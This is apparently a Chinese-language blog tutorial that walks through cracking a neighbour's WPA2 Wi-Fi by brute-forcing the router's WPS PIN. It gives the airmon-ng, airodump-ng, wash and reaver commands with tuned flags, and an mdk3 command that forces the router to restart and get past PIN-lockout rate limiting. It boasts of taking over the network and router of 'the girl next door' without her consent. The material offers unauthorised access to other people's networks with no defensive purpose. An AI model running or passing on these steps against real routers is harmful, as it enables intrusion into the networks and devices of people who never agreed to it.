007 avatar

Wifi破解實戰,隔壁妹子的Wi-Fi被我拿下來

🕥 by 007

Kali作業系統

WPA2-PSK加密原理

現在的路由器大多都預設用 WPA2-PSK 方式對無線網路進行加密了,不能再像 WEP 加密方式那樣好破解,使用字典又需要費心費力地整理字典,而且字典破解的效率還慢。 所以我們需要更有效率的破解方法。 好在現在大多數的路由器都提供WPS功能,通過這個功能,使用者可以使用PIN碼登錄到路由器。 但這個 PIN 碼的長度只有 8 位,而且可能的取值只有11000種(注意,不是 108 種)。 所以我們可以進行簡單粗暴的窮舉 PIN 碼破解,而且我們可以推斷出這種破解方法在目標 AP 開啟了 WPS 功能的情況下是可以百分之百破解它的。 這其實是很老的破解手段了,但至今依然奏效。

操作步驟

1.切換無線網卡到監聽模式

Bash:
1
airmon-ng  start  wlan0

2刺探附近 WLAN 網路(這個命令所跟的參數值可以在 步驟1 完成後從提示資訊中查看到)

Bash:
1
airodump-ng  wlan0mon

img

3.找出開啟了 WPS 功能、可以使用 PIN碼 登錄的路由器,並另外記錄下該 AP 的 BSSID(約等於該 AP 的 MAC 位址)

Bash:
1
wash  -i  wlan0mon

img

4.開始進行 PIN碼 窮舉破解(注意末尾的參數是 2 個小寫字母 v)

Bash:
1
reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -vv

參數說明:

-i 無線網 卡名稱 -b 目標 AP的mac位址 -a 自動檢測目標AP最佳配置 -S 使用最小的DH

key,可以提高破解速度 -vv 顯示更多的非嚴重 警告(注意這是 2 個小寫字母 v) -d 即delay每窮舉一次的閑置時間 預設為1秒 -c 信道 編號 -p PIN碼四位或八位 /可以用8位直接找到密碼。

破解時推薦使用這個命令:reaver -i wlan0mon -b D8:15:0D:D6:13:92 -a -S -d9 -t9 -vv,因為–d9 –t9參數可以防止pin死路由器。

img

5.等待破解完成(這個破解可能會時間比較長,和你的目標 AP 有關,隔壁妹子沒有網路安全意識,密碼很脆弱,只用了幾分鐘便破解了),這期間我們可以查看到窮舉破解花費的時間、預計剩餘時間、窮舉PIN碼進度 資訊

img

6.破解成功

Wifi破解實戰,隔壁妹子的Wi-Fi被我拿下來

7.成功联网

在这里插入图片描述

Wifi破解實戰,隔壁妹子的Wi-Fi被我拿下來

8.拿下路由器

Wifi破解實戰,隔壁妹子的Wi-Fi被我拿下來

Wifi破解實戰,隔壁妹子的Wi-Fi被我拿下來

注意事項

  • 如果在執行 reaver 命令後看到有 WARNING: Failed to associate with xx:xx:xx:xx:xx:xx 這樣的提示資訊,那麼應該是你選擇了一個不具備或關閉了 WPS 功能的路由器。 這種情況下就執行wash 命令並重新選擇一個路由器吧。
  • 如果在執行 reaver 命令後看到有 warning detected ap rate limiting waiting 60 seconds before re-checking 這樣的提示資訊,這表示目標路由器開啟了防 PIN破解 功能。 因為我們是窮舉 PIN碼 進行破解的,當連續使用超過某個次數的 PIN碼 后,路由器會暫時鎖定 WPS 功能一段時間。 這種情況下要麼我們耐心等待其恢復WPS功能,要麼執行 mdk3 wlan0mon a -a xx:xx:xx:xx:xx:xx (這是上面的目標AP的MAC位址)命令讓路由器主動重啟或被動重啟以恢復 WPS 功能。

写一条评论

Based on Golang + fastHTTP + sdb | go1.16.4 Processed in 0ms